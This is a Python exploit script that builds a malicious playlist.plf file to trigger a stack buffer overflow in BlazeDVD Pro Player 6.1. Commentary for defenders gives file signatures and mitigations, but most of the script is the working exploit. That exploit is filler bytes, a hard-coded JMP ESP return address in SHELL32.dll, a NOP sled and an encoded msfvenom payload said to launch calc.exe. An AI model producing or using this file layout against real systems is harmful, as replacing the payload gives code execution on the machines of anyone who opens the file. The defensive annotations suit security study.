BlazeDVDProPlayer6.1-LocalStackBufferOverflow.py
#!/usr/bin/env python
# Proof-of-concept file generator for a local stack buffer overflow in
# BlazeDVD Pro Player 6.1 (target and bug class taken from the file name).
# The script does not touch the player: it only concatenates five byte
# strings and writes them to "playlist.plf" in the current directory.
#
# Usage (per the author): run the script to produce playlist.plf, then open
# that file in BlazeDVD.
#
# File layout written below:  junk | eip | nop | buf | nop
#
# Defender notes:
#   - The generated file is not a line-oriented playlist: it starts with 260
#     bytes of 0x41 followed by binary data. That shape is a usable content
#     signature for .plf files arriving by mail or download.
#   - The embedded payload is described by the author as launching calc.exe,
#     so the player process spawning a child process is the behavioural
#     indicator to alert on.
#   - The return address is a hard-coded absolute address and the payload is
#     placed in the overflowed buffer itself, so this layout presumably
#     depends on a fixed module base and an executable stack; ASLR and DEP
#     are the relevant mitigations - confirm against the affected build.

# Filler: 260 'A' bytes. Presumably the distance from the start of the
# overflowed buffer to the saved return address - not verifiable from here.
junk = '\x41' * 260
# Four bytes written immediately after the filler. The author's comment gives
# them as little-endian 0x7CB32D69, a JMP ESP inside SHELL32.dll, and lists
# the byte values that must not appear in the file ("Bad:").
eip = '\x69\x2D\xB3\x7C' #JMP ESP SHELL32.dll 7CB32D69 // Bad:'\x00\xff\x0a\x0d\x1a'
# 50 bytes of 0x90 (x86 NOP), used as padding on both sides of the payload.
nop = '\x90' * 50
# Payload bytes. The four comment lines below are the author's record of how
# the payload was generated; its stated effect is to start calc.exe, i.e. a
# harmless proof of code execution. The bytes are encoded, so that effect
# cannot be confirmed by reading them here.
# windows/exec - 220 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
buf = ""
buf += "\xda\xdf\xbd\x74\x2d\xbe\x01\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x31\x31\x6a\x18\x83\xea\xfc\x03\x6a\x60\xcf"
buf += "\x4b\xfd\x60\x8d\xb4\xfe\x70\xf2\x3d\x1b\x41\x32\x59"
buf += "\x6f\xf1\x82\x29\x3d\xfd\x69\x7f\xd6\x76\x1f\xa8\xd9"
buf += "\x3f\xaa\x8e\xd4\xc0\x87\xf3\x77\x42\xda\x27\x58\x7b"
buf += "\x15\x3a\x99\xbc\x48\xb7\xcb\x15\x06\x6a\xfc\x12\x52"
buf += "\xb7\x77\x68\x72\xbf\x64\x38\x75\xee\x3a\x33\x2c\x30"
buf += "\xbc\x90\x44\x79\xa6\xf5\x61\x33\x5d\xcd\x1e\xc2\xb7"
buf += "\x1c\xde\x69\xf6\x91\x2d\x73\x3e\x15\xce\x06\x36\x66"
buf += "\x73\x11\x8d\x15\xaf\x94\x16\xbd\x24\x0e\xf3\x3c\xe8"
buf += "\xc9\x70\x32\x45\x9d\xdf\x56\x58\x72\x54\x62\xd1\x75"
buf += "\xbb\xe3\xa1\x51\x1f\xa8\x72\xfb\x06\x14\xd4\x04\x58"
buf += "\xf7\x89\xa0\x12\x15\xdd\xd8\x78\x73\x20\x6e\x07\x31"
buf += "\x22\x70\x08\x65\x4b\x41\x83\xea\x0c\x5e\x46\x4f\xe2"
buf += "\x14\xcb\xf9\x6b\xf1\x99\xb8\xf1\x02\x74\xfe\x0f\x81"
buf += "\x7d\x7e\xf4\x99\xf7\x7b\xb0\x1d\xeb\xf1\xa9\xcb\x0b"
buf += "\xa6\xca\xd9\x6f\x29\x59\x81\x41\xcc\xd9\x20\x9e"
# Final file content, in the order documented at the top of the script.
exploit = junk + eip + nop + buf + nop
# The file is opened in text mode with no explicit encoding, and the handle
# is closed manually rather than via a context manager.
# NOTE(review): the content is a plain str holding \xNN escapes, so the
# bytes that reach disk depend on the interpreter's string semantics -
# looks written for Python 2; confirm.
f = open("playlist.plf","w")
# writelines() on a str iterates it character by character, so this writes
# the whole string once, with no separators added.
f.writelines(exploit)
f.close()
# Status message only: it reports that the file was written, not that
# anything was run against the player.
print("\nExploit Completed :)\n")